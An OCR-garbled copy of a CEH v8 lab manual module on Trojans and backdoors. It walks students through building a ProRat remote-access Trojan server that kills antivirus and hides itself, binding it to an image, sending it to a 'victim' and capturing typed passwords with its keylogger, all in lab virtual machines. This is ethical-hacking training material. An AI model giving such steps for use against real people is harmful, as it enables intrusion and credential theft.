ceh v8 labs module 06 trojans and backdoors

CEH Lab Manual

T r o j a n s a n d

B a c k d o o r s

M o d u l e 0 6

M odule 0 6 - T ro ja n s a n d B a c k d o o rs

T r o j a n s a n d B a c k d o o r s

A Trojan is a program th a t contains a m alicious or harm ful code inside apparently harm less program m ing or data in such a iray th a t i t can get control and cause damage, such as m ining the file allocation table on a hard drive.

L a b S ce n a rioA c c o r d i n g t o B a n k I n t o S e c u r i t y N e w s ( h t t p : / / w w w . b a n k i n f o s e c u r i t y . c o m ) ,

T r o j a n s p o s e s e r i o u s r i s k s t o r a n y p e r s o n a l a n d s e n s i t i v e i n f o r m a t i o n s t o r e d 0 1 1

c o m p r o m i s e d A n d r o i d d e v i c e s , t h e F B I w a r n s . B u t e x p e r t s s a y a n y m o b i l e

d e v i c e i s p o t e n t i a l l y a t r i s k b e c a u s e t h e r e a l p r o b l e m i s m a l i c i o u s a p p l i c a t i o n s ,

w h i c h 1 1 1 a n o p e n e n v i r o n m e n t a r e i m p o s s i b l e t o c o n t r o l . A n d a n y w h e r e

m a l i c i o u s a p p s a r e a r o u n d , s o i s t h e p o t e n t i a l f o r f i n a n c i a l f r a u d .

A c c o r d i n g t o c y b e r s e c u r i t y e x p e r t s , t h e b a n k i n g T r o j a n k n o w n a s c i t a d e l , a n

a d v a n c e d v a r i a n t o f z e u s , i s a k e y l o g g e r t h a t s t e a l s o n l i n e - b a n k i n g c r e d e n t i a l s b y

c a p t u r i n g k e y s t r o k e s . H a c k e r s t h e n u s e s t o l e n l o g i n I D s a n d p a s s w o r d s t o

a c c e s s o n l i n e a c c o u n t s , t a k e t h e m o v e r , a n d s c h e d u l e f r a u d u l e n t t r a n s a c t i o n s .

H a c k e r s c r e a t e d t i n s T r o j a n t h a t i s s p e c i f i c a l l y d e s i g n e d f o r f i n a n c i a l f r a u d a n d

s o l d 0 1 1 t h e b l a c k m a r k e t .

Y o u a r e a s e c u r i t y a d m i n i s t r a t o r o f y o u r c o m p a n y , a n d y o u r j o b r e s p o n s i b i l i t i e s

i n c l u d e p r o t e c t i n g t h e n e t w o r k f r o m T r o j a n s a n d b a c k d o o r s , T r o j a n a t t a c k s , t h e

t h e f t o f v a l u a b l e d a t a f r o m t h e n e t w o r k , a n d i d e n t i t y t h e f t .

L a b O b je ctiv e sT h e o b j e c t i v e o f t i n s l a b i s t o h e l p s t u d e n t s l e a r n t o d e t e c t Trojan a n d backdoor a t t a c k s .

T h e o b j e c t i v e o f t h e l a b i n c l u d e :

■ C r e a t i n g a s e r v e r a n d t e s t i n g a n e t w o r k f o r a t t a c k

■ D e t e c t i n g T r o j a n s a n d b a c k d o o r s

■ A t t a c k i n g a n e t w o r k u s i n g s a m p l e T r o j a n s a n d d o c u m e n t i n g a l l

v u l n e r a b i l i t i e s a n d f l a w s d e t e c t e d

L a b En viro n m en t

T o c a r r y o u t t i n s , y o u n e e d :

A י c o m p u t e r r u n n i n g Window Server 2008 a s G u e s t - 1 i n v i r t u a l m a c h i n e

Window 7 r י u n n i n g a s G u e s t - 2 i n v i r t u a l m a c h i n e

י A w e b b r o w s e r w i t h I n t e r n e t a c c e s s

■ A d m i n i s t r a t i v e p r i v i l e g e s t o r u n t o o l s

I CON KEY

1 ~! V a l u a b l e

i n f o r m a t i o n

T e s t t o u t

k n o w l e d g e ____________

m W e b e x e r c i s e

W o r k b o o k r e v i e w

& Tools demonstrated in this lab are available in D:\CEH- Tools\CEHv8 Module 06 Trojans and Backdoors

Eth ica l H acking and Countemieasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Stricdy Prohibited.

C E H Lab M anual Page 425

http://www.bankinfosecurity.com


L a b D u r a t io n

T i m e : 4 0 M i n u t e s

O v e r v i e w o f T r o j a n s a n d B a c k d o o r s

A T r o j a n i s a p r o g r a m t h a t c o n t a i n s malicious o r h a r m t i l l c o d e i n s i d e a p p a r e n t l y

h a r m l e s s programming 0 1 d ־ a t a 1 1 1 s u c h a w a y t h a t i t c a n get control a n d c a u s e

d a m a g e , s u c h a s r u i n i n g d i e file allocation t a b l e 0 1 1 a h a r d d i s k .

W i t h t h e h e l p o f a Trojan, a n a t t a c k e r g e t s a c c e s s t o stored passwords 1 1 1 a

c o m p u t e r a n d w o u l d b e a b l e t o r e a d p e r s o n a l d o c u m e n t s , delete files, display pictures, a n d / 0 1 s ־ h o w m e s s a g e s 0 1 1 t h e s c r e e n .

L a b T a s k sTAS K 1

P i c k a n o r g a n i z a t i o n d i a t y o u f e e l i s w o r t h y o f y o u r a t t e n t i o n . T i n s c o u l d b e a n

Overview e d u c a t i o n a l i n s t i t u t i o n , a c o m m e r c i a l c o m p a n y , 0 1 p ־ e r h a p s a n o n p r o t i t c h a r i t y .

R e c o m m e n d e d l a b s t o a s s i s t y o u w i d i T r o j a n s a n d b a c k d o o r s :

■ C r e a t i n g a S e r v e r U s i n g t h e P r o R a t t o o l

■ W r a p p i n g a T r o j a n U s i n g O n e F i l e E X E M a k e r

■ P r o x y S e r v e r T r o j a n

■ H T T P T r o j a n

■ R e m o t e A c c e s s T r o j a n s U s i n g A t e l i e r W e b R e m o t e C o m m a n d e r

י D e t e c t i n g T r o j a n s

י C r e a t i n g a S e r v e r U s i n g t h e T h e e t

■ C r e a t i n g a S e r v e r U s i n g t h e B i o d o x

■ C r e a t i n g a S e r v e r U s i n g t h e M o S u c k e r

י H a c k W i n d o w s 7 u s i n g M e t a s p l o i t

L a b A n a l y s i s

A n a l y z e a n d d o c u m e n t t h e r e s u l t s r e l a t e d t o t h e l a b e x e r c i s e . G i v e y o u r o p i n i o n 0 1 1

y o u r t a r g e t ’ s s e c u n t y p o s t u r e a n d e x p o s u r e d i r o u g h p u b l i c a n d t r e e i n f o r m a t i o n .

P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S

R E L A T E D T O T H I S L A B .

C E H Lab M anual Page 426 Eth ica l H acking and Countemieasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Stricdy Prohibited.


Lab

C r e a t i n g a S e r v e r U s i n g t h e P r o R a t

T o o l

A Trojan is a program th a t contains m alicious or harm ful code inside apparent/)׳ harm less program m ing or data in such a way th a t i t can get control and cause damage, such as m ining the file allocation table on a hard drive.

L a b S c e n a r i o

A s m o r e a n d m o r e p e o p l e r e g u l a r l y u s e t h e I n t e r n e t , c y b e r s e c u r i t y i s b e c o m i n g

m o r e i m p o r t a n t f o r e v e r y o n e , a n d y e t m a n y p e o p l e a r e n o t a w a r e o f i t . H a c k e r

a r e u s i n g m a l w a r e t o h a c k p e r s o n a l i n f o r m a t i o n , f i n a n c i a l d a t a , a n d b u s i n e s s

i n f o r m a t i o n b y i n f e c t i n g s y s t e m s w i t h v i r u s e s , w o r m s , a n d T r o j a n h o r s e s . B u t

I n t e r n e t s e c u r i t y i s n o t o n l y a b o u t p r o t e c t i n g y o u r m a c h i n e f r o m m a l w a r e ;

h a c k e r s c a n a l s o s n i f f y o u r d a t a , w h i c h m e a n s t h a t t h e h a c k e r s c a n l i s t e n t o y o u r

c o m m u n i c a t i o n w i t h a n o t h e r m a c h i n e . O t h e r a t t a c k s i n c l u d e s p o o f i n g ,

m a p p i n g , a n d h i j a c k i n g .

S o m e h a c k e r s m a y t a k e c o n t r o l o f y o u r a n d m a n y o t h e r m a c h i n e s t o c o n d u c t a

d e n i a l - o f - s e r v i c e a t t a c k , w h i c h m a k e s t a r g e t c o m p u t e r s u n a v a i l a b l e f o r n o r m a l

b u s i n e s s . A g a i n s t h i g h - p r o f i l e w e b s e r v e r s s u c h a s b a n k s a n d c r e d i t c a r d

g a t e w a y s .


i n c l u d e p r o t e c t i n g t h e n e t w o r k f r o m T r o j a n s a n d b a c k d o o r s , T r o j a n a t t a c k s ,


L a b O b j e c t i v e s

T h e o b j e c t i v e o f t i n s l a b i s t o h e l p s t u d e n t s l e a r n t o d e t e c t T r o j a n a n d b a c k d o o r

a t t a c k s .

T h e o b j e c t i v e s o f t h e l a b i n c l u d e :

■ C r e a t i n g a s e r v e r a n d t e s t i n g t h e n e t w o r k f o r a t t a c k

■ D e t e c t i n g T r o j a n s a n d b a c k d o o r s

I CON KEY

1 ^ 7 V a l u a b l e


T e s t y o u r

k n o w l e d g e

= W e b e x e r c i s e

m W o r k b o o k r e v i e w


Eth ica l H acking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Stricdy Prohibited.

C E H Lab M anual 27


י A t t a c k i n g a n e t w o r k u s i n g s a m p l e T r o j a n s a n c l d o c u m e n t i n g a l l

v u l n e r a b i l i t i e s a n d f l a w s d e t e c t e d

L a b E n v i r o n m e n t

T o e a r n t ״ i n s o u t , y o u n e e d :

■ T h e Prorat t o o l l o c a t e d a t D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\ProRat

■ A c o m p u t e r r u n n i n g W i n d o w s S e r v e r 2 0 1 2 a s H o s t M a c h i n e

■ A c o m p u t e r r u n n i n g Window 8 (Virtual Machine)

■ Windows Server 2008 r u n n i n g 1 1 1 V i r t u a l M a c h i n e

י A w e b b r o w s e r w i t h Internet a c c e s s

י A d m i n i s t r a t i v e p r i v i l e g e s t o 1 1 1 1 1 t o o l s


T u n e : 2 0 M i n u t e s


A T r o j a n i s a p r o g r a m t h a t c o n t a i n s malicious o r h a r m f u l c o d e i n s i d e a p p a r e n t l y

h a r m l e s s p r o g r a m m i n g o r d a t a i n s u c h a w a y t h a t i t c a n get control a n d c a u s e

d a m a g e , s u c h a s r u i n i n g d i e f i l e a l l o c a t i o n t a b l e o n a h a r d d r i v e .

Note: T h e v e r s i o n s o f t h e c r e a t e d C l i e n t o r H o s t a n d a p p e a r a n c e o f t h e w e b s i t e m a y

d i f f e r f r o m w h a t i s i n d i e l a b , b u t t h e a c u i a l p r o c e s s o f c r e a t i n g t h e s e r v e r a n d d i e

c l i e n t i s t h e s a m e a s s h o w n 1 1 1 d i i s l a b .

L a b T a s k s

L a u n c h W i n d o w s 8 V i r t u a l M a c h i n e a n d n a v i g a t e t o Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\ProRat.

D o u b l e - c l i c k ProRat.exe 1 1 1 W i n d o w s 8 V i r t u a l M a c h i n e .

C l i c k Create Pro Rat Server t o s t a r t p r e p a r i n g t o c r e a t e a s e r v e r .

Create Server with ProRat

2.

3 .




English

Connect

ApplicationsWindowsAdmin-FTPFile ManagerSearch FilesRegistry

KeyLoggerPasswords

ProConnective

P flD H R C H .n ET P f?D FE5 5 ID r> H L H TTEH nET !!!

Online EditorCreate

Create Downloader Server (2 Kbayt) ►יCreate CGI Victim List (16 Kbayt)

^Help

PC InfoMessage

Funny Stuff!Explorer

Control PanelShut Down PC

ClipboardGive DamageR. Downloder

Printer

F I G U R E 1 .1 : P r o R a t m a in w in d o w

4 . T h e Create Server w i n d o w a p p e a r s .

Test

Testbomberman@y ahoo. com

Test

Testhttp: //ww w.yoursite. corn/cgi-bin/prorat cgi

Create Server

Create ServerProConnective Notification (Network and Router) Supports Reverse Connection ט Use ProConnective NotificationIP (DNS) Address: »ou. no*1p.comMail NotificationDoesn't support Reverse ConnectionQ Use Mail Notification E-MAIL:ICQ Pager NotificationDoesn't support Reverse ConnectionQ Use ICQ Pager Notificationicquin: [r]CGI NotificationDoesn't support Reverse Connection

Q Use CGI Notification CGI URL:

Notifications

General Settings

Bind with File

Server Extensions

Server Icon

W) Help

Server Size: 342 Kbaytr

1 y= J P a s s w o r d b u t to n :

R e t r ie v e p a s s w o r d s f r o m

m a n y s e rv ic e s , s u c h as p o p 3 a c c o u n ts , m e s s e n g e r ,

I E , m a i l , e tc .

F I G U R E 1.2: P r o R a t C r e a te S e r v e r W i n d o w

5 . C l i c k General Settings t o c h a n g e f e a t u r e s , s u c h a s Server Port. Server Password, Victim Name, a n d t h e Port Number y o u w i s h t o c o n n e c t

o v e r t h e c o n n e c t i o n y o u h a v e t o t h e v i c t i m o r l i v e t h e s e t t i n g s d e f a u l t .

6 . U n c h e c k t h e h i g h l i g h t e d options a s s h o w n 1 1 1 t h e f o l l o w i n g s c r e e n s h o t .




Server Port:Server Password:Victim Name:Q 3ive a fake error message.Q ••1elt server on install.Q Cill AV-FW on start.Q disable Windows XP SP2 Security CenterI...Q Disable Windows XP Firewall.Q Hear Windows XP Restore Points.Q )on't send LAN notifications from (i92.i68.”.“j or (10.*.x.xj

Create Server

I I Protection for removing Local Server InvisibilityQ Hide Processes from All Task Managers (9x/2k/XP)Q Hide Values From All kind of Registry Editors (9x/2k/XP) Q Hide Names From Msconfig (9x/2k/KP)Q UnT erminate Process (2k/XP)

General Settings

Bind with File

Server Extensions

Server Icon

Server Size: 342 Kbaytr

I t y ! N o t e : y o u c a n u s e

D y n a m ic D N S t o c o n n e c t o v e r th e In t e r n e t b y u s in g

n o - ip a c c o u n t r e g is t ra t io n .

F I G U R E 1.3: P r o R a t C r e a t e S e r v e r - G e n e r a l S e t t in g s

7 . C l i c k Bind with File t o b i n d t h e s e r v e r w i t h a f i l e ; 1 1 1 t i n s l a b w e a r e

u s i n g t h e .jpg f i l e t o b i n d t h e s e r v e r .

8 . C h e c k Bind server with a file. C l i c k Select File, a n d n a v i g a t e t o

Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\ProRat\lmages.

9 . S e l e c t t h e Girl.jpg f i l e t o b i n d w i t h t h e s e r v e r .

Create Server

This File will be Binded:Bind with File

Server Extensions

Server Icon

Server Size: 342 KbaytI--------------

m C l ip b o a rd : T o re a d

d a ta f r o m r a n d o m a c c e s s m e m o r y .

F I G U R E 1.4: P r o R a t B in d in g w i t h a f ile



1 0 . S e l e c t Girl.jpg 1 1 1 t h e w i n d o w a n d t h e n c l i c k Open t o b i n d t h e f i l e .


£ Q 1 V N C T r o ja n s ta r ts a

V N C s e r v e r d a e m o n in th e in f e c t e d s y s te m .

1 1 . C l i c k OK a f t e r s e l e c t i n g t h e i m a g e f o r b i n d i n g w i t h a s e r v e r .

£ 9 F i l e m a n a g e r : T o

m a n a g e v i c t im d ir e c to r y f o r a d d , d e le te , a n d m o d if y .

1 2 . 111 Server Extensions s e t t i n g s , s e l e c t EXE ( l i a s i c o n s u p p o r t ) 1 1 1 Select Server Extension o p t i o n s .

ImagesLook in:

ו11°תז

Open

Cancel

GirlRle name:

Files of type:

F I G U R E 1.5: P r o R a t b in d in g a n im a g e




Select Server Extension ^ EXE (Has icon support) Q SCR (Has icon support)Q PIF (Has no icon support) Q COM (Has no icon support)Q BAT (Has no icon support)

Notifications

General Settings

Bind with File

Server Extensions

Server Icon

Create ServerServer Size: 497 Kbaytr

£ Q G i v e D a m a g e : T o

f o r m a t t h e e n t ir e s y s te m

f ile s .

F I G U R E 1.7: P r o R a t S e r v e r E x t e n s io n s S e t t in g s

1 3 . 111 Server Icon s e l e c t a n y o f t h e i c o n s , a n d c l i c k t h e Create Server b u t t o n a t b o t t o m r i g h t s i d e o f t h e P r o R a t w i n d o w .

M

H U 11

j J

Notifications

General Settings

Bind with File

Server Extensions

Server Icon

Choose new IconServer Icon:

V) Help

Create ServerServer Size: 497 KbaytI

F I G U R E 1.8: P r o R a t c r e a t in g a s e r v e r

1 4 . C l i c k O K a l t e r t h e s e r v e r h a s b e e n p r e p a r e d , a s s h o w n 1 1 1 t h e l o l l o w i n g

s c r e e n s h o t .

m I t c o n n e c t s to th e

v i c t im u s in g a n y V N C

v ie w e r w i t h th e p a s s w o r d

“ s e c re t .”




F I G U R E 1 .9 : P r o R a t S e r v e r h a s c r e a te d 111 d ie s a m e c u r r e n t d i r e c to r y

1 5 . N o w y o u c a n s e n d d i e s e r v e r f i l e by mail o r a n y c o m m u n i c a t i o n m e d i a

t o t h e victim’s m a c h i n e a s , l o r e x a m p l e , a celebration f i l e t o r u n .

A &

נ״י

Applicator Tools

ManageVicvr

□ Item check boxes

□ Filename extensions 1I I Hidden items

Show/hide

"t N־־₪

St Extra large icons Large icons f t | M5d un icons | | j Small icons

lirt | j ״ Details

______________ Layout_________S

E m Preview pane

B־[] Details pane

o © ^ « Trcjans Types ► Femote Access Trojans (RAT)

A *K Favorites . J . Downlead

■ Desktop Irraces

£ Download} J , Language

1S3J Recent places | ^ bnded.server |^ 1Fnglish

־1 f Libraries £ ProRat

F*| Documtnte j__ Readme

J* Music ^ T rk6h״

fcl Pictures |__ Version.Renewals

81 Videos

Homegrojp

AP ComputeisL, Local Disk O5 ? CEH-Tools (\\1a

^(1 Network v9 items 1 item selected 208 MB

F I G U R E 1 .10 : P r o R a t C r e a t e S e r v e r

1 6 . N o w g o t o W i n d o w s S e r v e r 2 0 0 8 a n d n a v i g a t e t o Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\ProRat.

1 7 . D o u b l e - c l i c k binder_server.exe a s s h o w n 1 1 1 t h e f o l l o w i n g s c r e e n s h o t .

£ G S H T T P D is a s m a ll

H T T P s e r v e r th a t c a n b e e m b e d d e d in s id e a n y

p ro g r a m . I t c a n b e w r a p p e d w i t h a g e n u in e p ro g r a m

(g a m e c l1es s .e x e ). W h e n

e x e c u te d , i t tu rn s a

c o m p u t e r in t o a n in v is ib le

w e b s e rv e r .




PraRat * 0) יJ%n(Trt>« » Rencte Acr«s "roiflrs RAT׳T י | p .

El• id t ^•w Tjolc t#lp

Oroanize ▼ View• ״ ^ °0°*

>1|- Pate modified— | - | Typ----------------- T " T ™ M t

ital

I •I Site H

[ : Readne[^ ־ uHoct j , Ya5»cn _R.c־«n o 5

-O g*. New Text Docuneil • No... I

Tavoi ite -»־ks

i | r>ornn#ntc

£ ?1cajres ^ Music

More »

Folders v

I J i Botnet 'rojars j jI ^ Comnand Shell ~r0)s I Defacenent ־ro;ars I J4 Destnjave T'ojansI Ebandng Trojans I J4 E-Mal T0׳j3ns I JA FTP Trojar I GUITrojors I HTTP H IP S "rpjars I S ICMP Backdoor I J4 MACOSXTrojons I J i Proxy Server Trojan:

. Remote Access “ rcj?- *I J . Apocalypse

X Atelie׳ Web Remji I 4. D*fkCo׳r«tRATI j.. ProRatI . VNC’ rojans H

£ M arl C S . ‘

F I G U R E 1.11: P r o R a t W in d o w s S e r v e r 2 0 0 8

1 8 . N o w s w i t c h t o W i n d o w s 8 V i r t u a l M a c h i n e a n d e n t e r t h e I P a d d r e s s o f

Windows Server 2008 a n d t h e l i v e p o r t n u m b e r a s t h e d e f a u l t 1 1 1 t h e

P r o R a t m a i n w i n d o w a n d c l i c k Connect.

1 9 . 111 t i n s l a b , t h e I P a d d r e s s o f W i n d o w s S e r v e r 2 0 0 8 i s ( 1 0 . 0 . 0 . 1 3 )

Note: I P a d d r e s s e s m i g h t b e d i f f e r 1 1 1 c l a s s r o o m l a b s

F T ProRat V1.9

-mum Poit

PC Info ApplicationsMessage WindowsChat Admin-FTP

Funny Stuff File Manager!Explorer Search Files

Control Panel RegistryScreen ShotShut Down PCKeyLoggerClipboardPasswordsGive Damage

R. DownloderServicesPrinter

ProConnectiveOnline EditorCreate

F I G U R E 112: P r o R a t C o n n e c t in g In f e c t e d S e r v e r

2 0 . E n t e r t h e password y o u p r o v i d e d a t t h e t i m e o t c r e a t i n g t h e s e r v e r a n d

c l i c k OK.

I C M P T r o ja n : C o v e r t

c h a n n e ls a re m e th o d s in

w h i c h a n a tta c k e r c a n h id e d a ta in a p r o to c o l d ia t is

u n d e te c ta b le .




Password:

CancelOK

F I G U R E 1.13: P r o R a t c o n n e c t io n w in d o w

2 1 . N o w y o u a r e connected t o t h e v i c t i m m a c h i n e . T o t e s t t h e c o n n e c t i o n ,

c l i c k PC Info a n d c h o o s e t h e s y s t e m i n f o r m a t i o n a s 1 1 1 t h e f o l l o w i n g

f i g u r e .

B f P>>—ProRat V 1 .9 IC o n n e c te d [1 0 .0 .0 .1 3 ^ ^ ^ H B B B ^ ^ ^ ^ ^ r׳ - x 1F H d H H C H .n e T p « o re 5 5 1 D n F 1 L 1m־e p r1 E T !!!

Disconnect

10Poit: g n g R

I B //////// PC Information ////////Computer Name WIN-EGBHISG14L0User Name AdministratorWindows UerWindows Language English (United StWindows Path C:\WindowsSystem Path C:\Windows\systemcTemp Path C:\Users\ADMINI~1\ProductldWorkgroup NOData 9/23/2012

English

l-LMail Address in Registry

W; HelpSystem Information

Last visited 25 web sites



Control Panel RegistryShut Down PC Screen Shot

Clipboard KeyLoggerGive Damage PasswordsR. Downloder Run

Printer ServicesOnline Editor F'roConnective

CreatePc information Received.

m C o v e r t c h a n n e ls r e ly

o n te c h n iq u e s c a lle d

tu n n e l in g , w h i c h a l lo w o n e p r o t o c o l to b e c a r r ie d o v e r

a n o t h e r p ro to c o l .

F I G U R E 1 .14 : P r o R a t c o n n e c t e d c o m p u t e r w i d o w

2 2 . N o w c l i c k KeyLogger t o steal u s e r p a s s w o r d s f o r t h e o n l i n e s y s t e m .

[r?~^roRa^7^onnectedn0l0l0^3r~P H □ H R C H E ח. T P P G F E S S IC in F IL in T E P r iE T !!!

I I 1 1 ׳ hDisconnectPoit: g n i R:ip: Q j Q 2

//////// PC Information ////////Computer Name WIN-EGBHISG14L0User Name AdministratorWindows UerWindows Language English (United StWindows Path C:\WindowsSystem Path C:\Windows\systernaTemp Path C:\Users\ADHINI~1\ProductldWorkgroup NOData 9/23/2012L i.

Mail Address in RegistryW; Help

System InformationLast visited 25 web sites



Control Panel RegistryShut Down PC Screen Shot

Clipboard KeyLoggerGive Damage PasswordsR. Downloder Run

Printer ServicesOnline Editor ProConnective

CreatePc information Received.

m TAS K 2

Attack System Using Keylogger

F I G U R E 1 .15 : P r o R a t K e y L o g g e r b u t to n

Eth ica l H acking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited.



2 3 . T h e Key Logger w i n d o w w i l l a p p e a r .

F I G U R E 1 .16 : P r o R a t K e y L o g g e r w in d o w

2 4 . N o w s w i t c h t o Windows Server 2008 m a c h i n e a n d o p e n a b r o w s e r o r

N o t e p a d a n d t y p e a n y t e x t .

i Text Document - NotepadFile Edit Format View Help

Hi thereפר

Th is is my username: [email protected] password: test<3@#S!@l|

AIk.F I G U R E 1 .17 : T e s t t y p e d in W in d o w s S e r v e r 2 0 0 8 N o t e p a d

2 5 . W h i l e t h e v i c t i m i s w r i t i n g a message o r e n t e r i n g a user name a n d

p a s s w o r d , y o u c a n c a p t u r e t h e l o g e n t i t y .

2 6 . N o w s w i t c h t o W i n d o w s 8 V i r t u a l M a c h i n e a n d c l i c k Read Log f r o m

t i m e t o t i m e t o c h e c k f o r d a t a updates t r o m t h e v i c t i m m a c h i n e .

m T l i i s T r o ja n w o r k s

l ik e a r e m o t e d e s k to p

a c c e s s . T h e h a c k e r g a in s

c o m p le t e G U I a c c e s s o f th e r e m o t e s y s te m :

■ In f e c t v i c t im ’s c o m p u t e r

w i t h s e r v e r .e x e a n d p la n t

R e v e r s e C o n n e c t in g T r o ja n .

■ T h e T r o ja n c o n n e c t s to

v i c t im ’s P o r t t o th e a t t a c k e r a n d e s ta b lis h in g

a r e v e r s e c o n n e c t io n .

■ A t t a c k e r t h e n h a s

c o m p le t e c o n t r o l o v e r

v i c t im ’s m a c h in e .

m B a n k in g T r o ja n s a re

p ro g r a m th a t s te a ls d a ta f r o m in f e c t e d c o m p u te r s

v ia w e b b ro w s e r s a n d

p ro te c te d s to ra g e .



mailto:[email protected]


E=9/23/201211:55:28 PM-

ahi bob this is my usemame;xyzatyahoo.com password; testshiftl buttowithl shiftbuttonwith2

| R e a d L o g | D e le te L o g S a v e a s C le a r S c r e e n H e lp

C □ 1-----------------------------------------------------------1 t •_1 •_! רו 11 י U L■—1 י L• L

| K e y L o g R e c e iv e d . |

F I G U R E 1 .18: P r o R a t K e y L o g g e r w in d o w

2 7 . N o w y o u c a n u s e a l o t o f f e a u i r e s f r o m P r o R a t o n t h e v i c t i m ’ s m a c h i n e .

Note: P r o R a t K e y l o g g e r w i l l n o t r e a d s p e c i a l c h a r a c t e r s .


A n a l y z e a n d d o c u m e n t d i e r e s u l t s r e l a t e d t o d i e l a b e x e r c i s e . G i v e y o u r o p i n i o n o n

y o u r t a r g e t ’ s s e c u n t y p o s t u r e a n d e x p o s u r e t h r o u g h p u b l i c a n d f r e e i n f o r m a t i o n .

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONSRELATED TO THIS LAB.

Q u e s t io n s1 . C r e a t e a s e r v e r w i t h a d v a n c e d o p t i o n s s u c h a s K i l l A V - F W o n s t a r t , d i s a b l e

W i n d o w s X P F i r e w a l l , e t c . , s e n d i t a n d c o n n e c t i t t o t h e v i c t i m m a c h i n e ,

a n d v e r i f y w h e d i e r y o u c a n c o m m u n i c a t e w i t h t h e v i c t i m m a c h i n e .

2 . E v a l u a t e a n d e x a m i n e v a r i o u s m e d i o d s t o c o n n e c t t o v i c t i m s i f d i e y a r e 1 1 1

o d i e r c i t i e s o r c o u n t r i e s .

Eth ica l H acking and Countenneasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Stricdy Prohibited.



T o o l / U t i l i t y I n f o r m a t i o n C o l l e c t e d / O b j e c t i v e s A c h i e v e d

S u c c e s s f u l c r e a t i o n o f B l i n d e d s e r v e r . e x e

O u t p u t : P C I n f o r m a t i o n

C o m p u t e r N a m e A Y I N - E G B H I S G 1 4 L O

U s e r N a m e : A d m i n i s t r a t o r

W i n d o w s Y e r :

P r o R a t T o o lW i n d o w s L a n g u a g e : E n g l i s h ( U n i t e d S t a t e s )

W i n d o w s P a t h : c : \ w i n d o w s

S y s t e m P a t h : c : \ w i n d o w s \ s y s t e m 3 2

T e m p P a t h : c : \ U s e r s \ A D M I N I ~ l \

P r o d u c t I D :

W o r k g r o u p : N O

D a t a : 9 / 2 3 / 2 0 1 2

I n t e r n e t C o n n e c t i o n R e q u i r e d

□ Y e s 0 N o

P l a t f o r m S u p p o r t e d

0 C l a s s r o o m 0 ! L a b s




Lab

W r a p p i n g a T r o j a n U s i n g O n e F i l e

E X E M a k e r

A Trojan is a program th a t contains m alicious or harm ful code inside apparently harm less program m ing or data in such a way th a t it can g et control and cause damage, such as m ining the file allocation table on a hard drive.


S o m e t i m e s a n a t t a c k e r m a k e s a v e r y s e c u r e b a c k d o o r e v e n m o r e s a f e r t h a n t h e

n o r m a l w a y t o g e t i n t o a s y s t e m . A n o r m a l u s e r m a y u s e o n l y o n e p a s s w o r d f o r

u s i n g t h e s y s t e m , b u t a b a c k d o o r m a y n e e d m a n y a u t h e n t i c a t i o n s 0 1 S ־ S H l a y e r s

t o l e t a t t a c k e r s u s e t h e s y s t e m . U s u a l l y i t i s h a r d e r t o g e t i n t o t h e v i c t i m s y s t e m

f r o m i n s t a l l e d b a c k d o o r s c o m p a r e d w i t h n o r m a l l o g g i n g i n . A f t e r g e t t i n g

c o n t r o l o t t h e v i c t i m s y s t e m b y a n a t t a c k e r , t h e a t t a c k e r i n s t a l l s a b a c k d o o r 0 1 1

t h e v i c t i m s y s t e m t o k e e p 111s 0 1 h ־ e r a c c e s s i n t h e f u t u r e . I t i s a s e a s y a s r u n n i n g

a c o m m a n d 0 1 1 t h e v i c t i m m a c h i n e . A n o t h e r w a y t h e a t t a c k e r c a n i n s t a l l a

b a c k d o o r i s u s i n g A c t i v e X . W l i e n e v e r a u s e r v i s i t s a w e b s i t e , e m b e d d e d

A c t i v e X c o u l d r u n 0 1 1 t h e s y s t e m . M o s t o f w e b s i t e s s h o w a m e s s a g e a b o u t

r u n n i n g A c t i v e X f o r v o i c e c h a t , d o w n l o a d i n g a p p l i c a t i o n s , 0 1 v ־ e r i f y i n g t h e u s e r .

111 o r d e r t o p r o t e c t y o u r s y s t e m f r o m a t t a c k s b y T r o j a n s a n d n e e d e x t e n s i v e

k n o w l e d g e 0 1 1 c r e a t i n g T r o j a n s a n d b a c k d o o r s a n d p r o t e c t i n g t h e s y s t e m f r o m

a t t a c k e r s .





T h e o b j e c t i v e o t t i n s l a b i s t o h e l p s m d e n t s l e a r n t o d e t e c t T r o j a n a n d b a c k d o o r

a t t a c k s .

T h e o b j e c t i v e s o f t h e l a b i n c l u d e :

■ W r a p p i n g a T r o j a n w i t h a g a m e 1 1 1 W i n d o w s S e r v e r 2 0 0 8

■ R u n n i n g t h e T r o j a n t o a c c e s s t h e g a m e 0 1 1 t h e f r o n t e n d

I CON KEY

£ 1 7 V a l u a b l e


T e s t y o u r

k n o w l e d g e

W e b e x e r c i s e

ט W o r k b o o k r e v i e w





■ A n a l y z i n g t h e T r o j a n r u n n i n g i n b a c k e n d


T o c a r r y o u t d i i s , y o u n e e d :

OneFileEXEMaker t י o o l l o c a t e d a t D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Wrapper Covert Programs\OneFileExeMaker

■ A c o m p u t e r r u n n i n g Window Server 2012 ( h o s t )

■ Windows Server 2008 r u n n i n g 1 1 1 v i r t u a l m a c h i n e

■ I t y o u d e c i d e t o d o w n l o a d t h e latest version, t h e n s c r e e n s h o t s s h o w n

1 1 1 t h e l a b m i g h t d i f f e r

■ A d m i n i s t r a t i v e p r i v i l e g e s t o m n t o o l s


T u n e : 2 0 M i n u t e s


A T r o j a n i s a p r o g r a m d i a t c o n t a i n s malicious o r h a r m f u l c o d e i n s i d e a p p a r e n d y

h a r m l e s s p r o g r a m m i n g o r d a t a 1 1 1 s u c h a w a y t h a t i t c a n get control a n d c a u s e

d a m a g e , s u c h a s r u i n i n g d i e h i e a l l o c a t i o n t a b l e o n a h a r d d n v e .

Note: T h e v e r s i o n s o f d i e c r e a t e d c l i e n t o r h o s t a n d a p p e a r a n c e m a y d i t f e r f r o m

